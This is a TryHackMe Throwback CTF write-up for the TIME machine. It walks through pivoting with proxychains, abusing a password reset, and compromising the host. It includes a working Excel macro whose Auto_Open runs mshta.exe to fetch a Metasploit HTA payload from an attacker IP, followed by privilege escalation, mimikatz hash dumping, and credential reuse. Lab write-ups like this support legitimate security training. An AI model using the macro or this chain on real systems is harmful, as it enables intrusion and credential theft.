CTF-Writeups/TryHackMe/Throwback/THROWBACK-TIME.md
2021-03-16 22:13:44 +05:00

2.8 KiB

TryHackMe-THROWBACK-TIME(100.20.34.176)

Since we ran socks4 proxy on port 1080 we use nmap along with proxychains to see if we can hit a port on TIME machine

So we can access the web page

Going back to MAIL machine to get reset link by logging in as MurhphyF

murphyf PASSWORD

Now we need to update our /etc/hosts file

We updated the password through the reset link and can login with those

Create a microsoft execl macro document having this macro in it using metasploit hta server

Sub HelloWorld()
    PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta")
End Sub

Sub Auto_Open()
    HelloWorld
End Sub

Where that .hta is generated through metasploit

Upload that document

You will get a shell

By typing sysinfo

We can see that we are on a 64 bit windows architecture but on 32 bit merterpreter session so we need to migrate to a 64 bit process. Running command ps to check currently running processes

Here we need to identify the process which is running as NT AUTHORITY\SYSTEM also running as a 64 bit

So we see this statisfying our requirements

And now we are the highest privileged user also now our meterpeter session is on 64 bit architecture

We can now run commands like mimikatz , hashdump

We have successfully dumped the hashes of the accounts on this machine

Using proxychains we ssh with Timekeeper's credentials

Switch to directory where mysql.exe is

Using the password from the kerberoasted mysql service account

Save the list of usernames you found from domain_users database

We can utilize the same list of passwords we used to get access to Throwbacks mail